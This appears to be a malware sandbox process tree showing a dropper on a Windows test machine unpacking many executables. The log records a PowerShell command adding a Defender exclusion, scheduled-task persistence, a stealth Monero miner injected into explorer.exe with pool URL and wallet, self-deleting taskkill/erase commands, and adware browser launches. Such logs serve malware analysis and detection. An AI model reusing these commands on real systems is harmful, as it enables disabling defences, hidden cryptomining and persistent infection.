C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Users\Admin\AppData\Local\Temp\7zS0C66E205\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0C66E205\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1068
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05ac1b0207d3ff3b8.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Users\Admin\AppData\Local\Temp\7zS0C66E205\Sun05ac1b0207d3ff3b8.exeSun05ac1b0207d3ff3b8.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1744 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 10046⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3000
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun052bbd8bebd9.exe4⤵
- Loads dropped DLL
PID:1508 -
C:\Users\Admin\AppData\Local\Temp\7zS0C66E205\Sun052bbd8bebd9.exeSun052bbd8bebd9.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1676
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05532f7abc.exe4⤵
- Loads dropped DLL
PID:936 -
C:\Users\Admin\AppData\Local\Temp\7zS0C66E205\Sun05532f7abc.exeSun05532f7abc.exe5⤵
- Executes dropped EXE
PID:2040
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05640630a6aa.exe4⤵
- Loads dropped DLL
PID:788 -
C:\Users\Admin\AppData\Local\Temp\7zS0C66E205\Sun05640630a6aa.exeSun05640630a6aa.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1740
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun059375dac544fc4a.exe4⤵
- Loads dropped DLL
PID:1828 -
C:\Users\Admin\AppData\Local\Temp\7zS0C66E205\Sun059375dac544fc4a.exeSun059375dac544fc4a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1596 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:748 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:2192
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:792
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:2220
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
PID:2224 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:2192
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:1824
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:2992
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:952
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
PID:2252
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2268 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2268 -s 15008⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2348 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:2200
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
PID:2452
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2632
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
PID:2680 -
C:\Users\Admin\AppData\Local\Temp\is-LEC34.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-LEC34.tmp\setup_2.tmp" /SL5="$101A8,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
PID:2744 -
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
PID:2876 -
C:\Users\Admin\AppData\Local\Temp\is-A6J97.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-A6J97.tmp\setup_2.tmp" /SL5="$201A8,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:3012 -
C:\Users\Admin\AppData\Local\Temp\is-TSQEH.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-TSQEH.tmp\postback.exe" ss111⤵PID:1016
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss112⤵PID:2816
-
C:\Users\Admin\AppData\Local\Temp\2aI3R46eX.exe"C:\Users\Admin\AppData\Local\Temp\2aI3R46eX.exe"13⤵PID:2060
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 2aI3R46eX.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\2aI3R46eX.exe" & del C:\ProgramData\*.dll & exit14⤵PID:1080
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 2aI3R46eX.exe /f15⤵
- Kills process with taskkill
PID:2780
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 615⤵
- Delays execution with timeout.exe
PID:3640
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\MzfZN0gsm.exe"C:\Users\Admin\AppData\Local\Temp\MzfZN0gsm.exe"13⤵PID:3308
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
PID:2716 -
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵
- Executes dropped EXE
PID:2792
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
PID:2852
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun050462125c7d35.exe4⤵PID:864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05899db881f67fb29.exe4⤵
- Loads dropped DLL
PID:1088 -
C:\Users\Admin\AppData\Local\Temp\7zS0C66E205\Sun05899db881f67fb29.exeSun05899db881f67fb29.exe5⤵
- Executes dropped EXE
PID:736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun054fe19a12cb3.exe4⤵
- Loads dropped DLL
PID:2024 -
C:\Users\Admin\AppData\Local\Temp\7zS0C66E205\Sun054fe19a12cb3.exeSun054fe19a12cb3.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05fa3b4d2ae56e.exe /mixone4⤵
- Loads dropped DLL
PID:1988 -
C:\Users\Admin\AppData\Local\Temp\7zS0C66E205\Sun05fa3b4d2ae56e.exeSun05fa3b4d2ae56e.exe /mixone5⤵
- Executes dropped EXE
PID:1540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05d60bc3b96248e5.exe4⤵
- Loads dropped DLL
PID:1656
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-318NH.tmp\Sun054fe19a12cb3.tmp"C:\Users\Admin\AppData\Local\Temp\is-318NH.tmp\Sun054fe19a12cb3.tmp" /SL5="$4012E,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS0C66E205\Sun054fe19a12cb3.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:288 -
C:\Users\Admin\AppData\Local\Temp\is-K3RS6.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-K3RS6.tmp\46807GHF____.exe" /S /UID=burnerch22⤵
- Executes dropped EXE
PID:2484 -
C:\Program Files\Google\CZOKYTNUHT\ultramediaburner.exe"C:\Program Files\Google\CZOKYTNUHT\ultramediaburner.exe" /VERYSILENT3⤵PID:1816
-
C:\Users\Admin\AppData\Local\Temp\is-9STT1.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-9STT1.tmp\ultramediaburner.tmp" /SL5="$201CC,281924,62464,C:\Program Files\Google\CZOKYTNUHT\ultramediaburner.exe" /VERYSILENT4⤵PID:1020
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu5⤵PID:2276
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\85-c6b08-385-86db5-454ef9c394106\Lebizhemyva.exe"C:\Users\Admin\AppData\Local\Temp\85-c6b08-385-86db5-454ef9c394106\Lebizhemyva.exe"3⤵PID:2172
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e64⤵PID:2844
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2844 CREDAT:275457 /prefetch:25⤵PID:676
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2844 CREDAT:2307080 /prefetch:25⤵PID:3724
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2844 CREDAT:1717277 /prefetch:25⤵PID:2052
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2844 CREDAT:1127442 /prefetch:25⤵PID:3228
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2844 CREDAT:2634775 /prefetch:25⤵PID:748
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad4⤵PID:1608
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18514834⤵PID:2072
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18515134⤵PID:3916
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=20872154⤵PID:2680
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=42631194⤵PID:1968
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=12942314⤵PID:3556
-
-
-
C:\Users\Admin\AppData\Local\Temp\b0-923c5-b1a-c25a0-7095f0356b269\Mokushaelixe.exe"C:\Users\Admin\AppData\Local\Temp\b0-923c5-b1a-c25a0-7095f0356b269\Mokushaelixe.exe"3⤵PID:1760
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xf0yqsfm.tpw\GcleanerEU.exe /eufive & exit4⤵PID:1500
-
C:\Users\Admin\AppData\Local\Temp\xf0yqsfm.tpw\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\xf0yqsfm.tpw\GcleanerEU.exe /eufive5⤵PID:1624
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\xf0yqsfm.tpw\GcleanerEU.exe" & exit6⤵PID:3560
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f7⤵
- Kills process with taskkill
PID:3604
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gboqqe2f.p3y\installer.exe /qn CAMPAIGN="654" & exit4⤵PID:2904
-
C:\Users\Admin\AppData\Local\Temp\gboqqe2f.p3y\installer.exeC:\Users\Admin\AppData\Local\Temp\gboqqe2f.p3y\installer.exe /qn CAMPAIGN="654"5⤵PID:2796
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\gboqqe2f.p3y\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\gboqqe2f.p3y\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631217644 /qn CAMPAIGN=""654"" " CAMPAIGN="654"6⤵PID:2228
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b0m2mtmi.xm2\anyname.exe & exit4⤵PID:3068
-
C:\Users\Admin\AppData\Local\Temp\b0m2mtmi.xm2\anyname.exeC:\Users\Admin\AppData\Local\Temp\b0m2mtmi.xm2\anyname.exe5⤵PID:3100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cmextide.uoe\gcleaner.exe /mixfive & exit4⤵PID:3236
-
C:\Users\Admin\AppData\Local\Temp\cmextide.uoe\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\cmextide.uoe\gcleaner.exe /mixfive5⤵PID:3280
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\cmextide.uoe\gcleaner.exe" & exit6⤵PID:3836
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f7⤵
- Kills process with taskkill
PID:3868
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ggxnrrnz.3mi\autosubplayer.exe /S & exit4⤵PID:3340
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0C66E205\Sun05d60bc3b96248e5.exeSun05d60bc3b96248e5.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:112 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 112 -s 7682⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2520 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:2528
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1620 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2996
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1703800983-1654870302-6163244591270765272-647692541111411224430548766-822296509"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2192
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:3736
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F3333289DC032481270E637122D7A1DB C2⤵PID:3984
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 05813CD9315CC9E9AD85C78647159DA52⤵PID:3472
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:2060
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 32E981120FE13F7DAA388C96F127DFA1 M Global\MSI00002⤵PID:1064
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3784 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:3800
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {000AC2EB-00B2-486B-9963-69B0CC744DA8} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1560
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 80802⤵PID:2656
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 80802⤵PID:1536
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 80802⤵PID:2576
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 80802⤵PID:2028
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 80802⤵PID:3248
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 80802⤵PID:2812
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 80802⤵PID:4212
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 80802⤵PID:7036
-